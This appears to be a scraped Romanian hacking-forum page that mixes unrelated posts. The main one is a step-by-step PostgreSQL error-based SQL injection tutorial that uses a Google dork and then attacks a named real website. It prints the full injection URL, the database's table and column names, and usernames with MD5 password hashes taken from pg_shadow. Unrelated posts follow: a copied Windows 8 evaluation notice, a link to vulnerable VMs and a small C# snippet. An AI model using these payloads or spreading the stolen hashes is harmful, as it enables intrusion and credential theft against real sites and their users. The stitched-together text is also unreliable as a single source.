Leaderboard

As dori sa imi incep activitatea pe RST cu un topic care va aduce "benifici" comunitati, sau userilor din aceasta comunitate. Probabil, majoritatea stiti cele mai usoare metode de SQL Injection [ principalele ]: MySQL Injection Union Based sau Blind etc. M-am gandit sa fac un tutorial pentru cei care "ar vrea" sa avanseze in injecti, si acela este: Un tutorial despre PostGreSQL Injection. --------------------------- Ca de obicei luam un site, m-am grabit si am luat un site [ cu ajutorul lui gooogle, prin dorku' -> inurl:.php? intext:Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: ] Ok, sa incepem partea "practica": [1] Daca ar fi sa o luam de la 0, am cauta versiunea bazei de date, pentru a afla versiunea este necesar urmatorul query: and 1=cast(version() as int)-- In cazul meu: [2] Continuarea se face prin aflarea tabelelor din baza de date, pentru a afla primul tabel este necesar urmatorul query: and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)-- In cazul meu: Primul tabel din baza de date, este pg_type. Pentru a trece la urmatorul tabel este necesar urmatorul query: and 1=cast((select table_name from information_schema.tables where table_name not in ('TABEL') limit 1 offset 0) as int)-- In cazul meu: and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type') limit 1 offset 0) as int)-- Urmatorul tabel este: pg_attribute Vom continua injectia, eu am facut-o mai pe scurt si m-am dus la tabelul care ma intereseaza [ cel cu useri ]. Query intreg: http://www.aspem.org/indexa.php?p=290&p1=-80' and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type','pg_attribute','user_mapping_options','user_mappings','tables','triggered_update_columns','triggers','usage_privileges','view_column_usage','view_routine_usage','view_table_usage','views','data_type_privileges','element_types','_pg_foreign_data_wrappers','foreign_data_wrapper_options','foreign_data_wrappers','pg_statistic','_pg_foreign_servers','foreign_server_options','foreign_servers','_pg_user_mappings','schemata','sequences','sql_features','sql_implementation_info','sql_languages','sql_packages','pg_database','pg_authid','pg_roles') limit 1 offset 0) as int)--+ Tabelul cu Useri este pg_shadow. [3] Continuam cu extragerea coloanelor din tabelul pg_shadow, este necesar urmatorul query: and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 0) as int)-- In cazul meu: Prima coloana: usename Pentru a extrage urmatoarea coloana este necesara urmatoarea modificare in Queryu' de deasupra. and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 1) as int)-- A 2 a coloana: usesysid Sarim... direct la coloana care ne intereseaza, coloana "passwd". and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 5) as int)-- Avem coloanele care ne intereseaza: usename & passwd. [4] Sa continuam, va trebui sa extragem din Usename & passwd. Data. Este necesar urmatorul Query: and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)-- Primul User: Al 2 lea user: postgres Al 3 lea user: salvataggi Prima Parola pentru useru' aspem: Aveti nevoie de urmatorul Query: and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)-- Voi sari peste partea cu restul pozelor [ pentru ca va descurcati singuri, "sunteti baieti mari" ] Total useri & parole: User: aspem Password: 4e8991501921aa20346da7d0ea86fe35 [MD5] User: postgres Password: 142484a40d02122af06bc427d4367d73 [MD5] User: salvataggi Password: No password. ---------------------------- Va multumesc ca "vati pierdut" timpul cu acest tutorial pe care poate [deja il stiati].

The Windows 8 Enterprise 90-day evaluation is available to developers to build and test Windows 8 apps on the final version of Windows 8. About This Evaluation This evaluation provides a 90-day trial of Windows 8 Enterprise edition. Both 32-bit and 64-bit versions are available as ISO images in the following languages: Chinese (Simplified), Chinese (Traditional), English, English (UK), French, German, Italian, Japanese, Korean, Portuguese (Brazil), and Spanish. In order to use this evaluation, you must register and the product must be activated online with Microsoft-hosted activation and validation services. Microsoft does not provide technical support for this software. Is the evaluation edition really for you? This is intended for developers building Windows 8 apps and IT professionals interested in trying Windows 8 Enterprise on behalf of their organization. If you qualify under one of the following programs listed below, you may already have access to the final bits and do not need to download this 90-day evaluation. MSDN Subscription Microsoft Partner Network TechNet Professional Subscription Microsoft Volume Licensing/Software Assurance Things to Know Before You Start The evaluation edition will expire and cannot be upgraded. To upgrade, the evaluation must be uninstalled and a non-evaluation version of Windows must be re-installed from your original installation media. Consider running the evaluation edition in a virtual environment or installing on a separate hard drive or partition. The will allow you to upgrade your original Windows installation to Windows 8. During registration (required) you must login with a Microsoft account and provide your name, e-mail address and country. You are required to activate the product online within 10 days after installing. Once the evaluation is installed, you cannot upgrade. To revert to a previous version of Windows, you must do a clean install from your original installation media. Activation and Usage Guidelines Back up your files and settings before installing this evaluation and again prior to the 90-day expiration. Upon installation, you will have 10 days to activate this evaluation online. Windows will prompt you to activate. A product key is not required for this software. You must complete activation before August 15, 2013, to use this evaluation. Once you activate, you have up to 90 days to use the software. You can track the amount of time you have left by referring to the “watermark” in the lower right corner of the Windows desktop. If you fail to activate this evaluation within the 10-day grace period, or if your evaluation period expires, the desktop background will turn black, you will see a persistent desktop notification indicating that the system is not genuine, and the PC will shut down every hour losing unsaved work. Following the evaluation period, you will need to replace the operating system on your test computer and reinstall all your programs and data. It is not possible to upgrade the evaluation to a licensed working version of Windows 8. A clean installation is required. System Requirements Windows 8 works on the same hardware that powers Windows 7: Processor: 1 gigahertz (GHz) or faster RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Hard disk space: 20 GB Graphics card: Microsoft DirectX 9 graphics device with WDDM driver Additional requirements to use certain features: To use touch, you need a tablet or a monitor that supports multitouch. To access the Windows Store and to download and run apps, you need an active Internet connection and a screen resolution of at least 1024 x 768. To snap apps, you need a screen resolution of at least 1366 x 768. Internet access (ISP fees might apply) Download the Windows 8 evaluation for developers Select the Version You Want to Download https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=30172D0F-3A8E-4E7D-9AC5-35CA5BA0DCCC&lcid=1033&ci=393 - Windows 8 Enterprise Evaluation Copy 32 Bit https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx?wizid=518B9627-D97E-4AB5-8126-B50862B8CC8A&lcid=1033&ci=393 - Windows 8 Enterprise Evaluation Copy 64 Bit Each version is available in the following languages: Chinese (Simplified) Chinese (Traditional) English English (UK) French German Italian Japanese Korean Portuguese (Brazil) Spanish. furat si nestructurat ; http://www.windows8update.com/download-free-windows-8-evaluation-copy-for-90-days/

Ms Nytro. Apropo o alta lista cu masini virtuale "exploatabile" gasiti aici: boot2root.info (de la g0tmi1k)

Random rand = new Random(); // facem functia de random string a = "cacat,pisat,unt"; string b = "-/*.,<>?&^%$#"; // caracterele care vrei sa fie schimbate string c= b[rand.Next(0,b.Length)].ToString(); a = a.Replace(",", c); // inlocuim virgula cu un caracter random din stringul b